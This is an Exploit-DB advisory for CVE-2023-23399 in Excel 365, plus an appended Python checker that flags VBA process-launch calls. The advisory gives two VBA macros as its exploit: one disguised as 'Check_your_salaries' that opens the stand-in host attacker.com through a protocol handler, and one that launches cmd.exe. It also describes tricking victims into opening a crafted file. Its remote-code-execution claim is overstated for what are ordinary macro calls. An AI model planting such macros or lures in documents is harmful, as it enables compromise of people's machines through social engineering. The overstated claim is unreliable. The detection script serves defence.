Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit – Remote Code Execution (RCE)

  • Author: nu11secur1ty
    Date: 2023-04-08
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51328/
  • ## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)
    ## Exploit Author: nu11secur1ty
    ## Date: 03.16.2023
    ## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel
    ## Software: https://www.microsoft.com/en-us/microsoft-365/excel
    ## Reference: https://www.invicti.com/learn/remote-code-execution-rce/
    ## CVE ID: CVE-2023-23399
    
    ## Description:
    A malicious user can exploit the victim's PC remotely.
    For example, when the score indicates that the Attack Vector is Local
    and User Interaction is Required, this could describe an exploit in
    which an attacker, through social engineering, convinces a victim to
    download and open a specially crafted file from a website, which leads
    to a local attack on their computer.
    
    STATUS: HIGH Vulnerability
    
    [+]Exploit0:
    ```
    Sub Check_your_salaries()
        ' Opens the URL through the microsoft-edge: protocol handler
        CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://attacker.com"
    End Sub
    ```
    [+]Exploit1:
    ```
    Sub cmd()
        Dim Program As String
        Dim TaskID As Double
        On Error Resume Next
        Program = "cmd.exe"
        TaskID = Shell(Program, 1)
        If Err <> 0 Then
            MsgBox "Can't start " & Program
        End If
    End Sub
    ```
    
    ## Reproduce:
    [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)
    
    ## Proof and Exploit:
    [href](https://streamable.com/dnyfx0)
    
    ## Time spent:
    03:00:00
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at
    https://packetstormsecurity.com/, https://cve.mitre.org/index.html and
    https://www.exploit-db.com/
    home page: https://www.nu11secur1ty.com/
    nu11secur1ty <http://nu11secur1ty.com/>
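
For triage, a static check over VBA source extracted from a workbook can flag the process-launch calls that both macros above rely on. This is an added example, not code from the advisory or its author; the rule names, `scan_vba` and the sample macro text are constructed for illustration.

```python
import re

# Process-launch primitives used by the two macros on this page.
RULES = {
    "shell-application-object": re.compile(r'CreateObject\s*\(\s*"Shell\.Application"\s*\)', re.I),
    "shellexecute-call": re.compile(r'\.ShellExecute\b', re.I),
    "vba-shell-builtin": re.compile(r'(?<![.\w])Shell\s*\(', re.I),
    "protocol-handler-url": re.compile(r'"microsoft-edge:[^"]*"', re.I),
}
PROC = re.compile(r'^\s*(?:(?:Public|Private)\s+)?(?:Sub|Function)\s+(\w+)', re.I)

def strip_comment(line):
    """Drop a trailing ' comment, ignoring apostrophes inside string literals."""
    in_string = False
    for i, ch in enumerate(line):
        in_string ^= ch == '"'
        if ch == "'" and not in_string:
            return line[:i]
    return line

def logical_lines(source):
    """Join physical lines that end in the VBA continuation marker ' _'."""
    buf = ""
    for raw in source.splitlines():
        line = strip_comment(raw).rstrip()
        if line.endswith(" _"):
            buf += line[:-1]
            continue
        yield buf + line
        buf = ""

def scan_vba(source):
    """Return sorted (procedure, rule) pairs for every rule hit in the source."""
    hits, proc = set(), "<module>"
    for line in logical_lines(source):
        if m := PROC.match(line):
            proc = m.group(1)
        hits.update((proc, name) for name, rx in RULES.items() if rx.search(line))
    return sorted(hits)

# Constructed sample modelled on the page's macros; the URL is a placeholder.
SAMPLE = '''Sub Check_your_salaries()
  ' Shell("calc.exe") in a comment must not match
  CreateObject("Shell.Application").ShellExecute _
      "microsoft-edge:https://example.invalid"
End Sub
Sub cmd()
  TaskID = Shell(Program, 1)
End Sub
'''
```

`scan_vba(SAMPLE)` reports three hits in `Check_your_salaries` and one in `cmd`; the `Shell(` call is flagged whatever its argument, so passing the program name through a variable does not hide it.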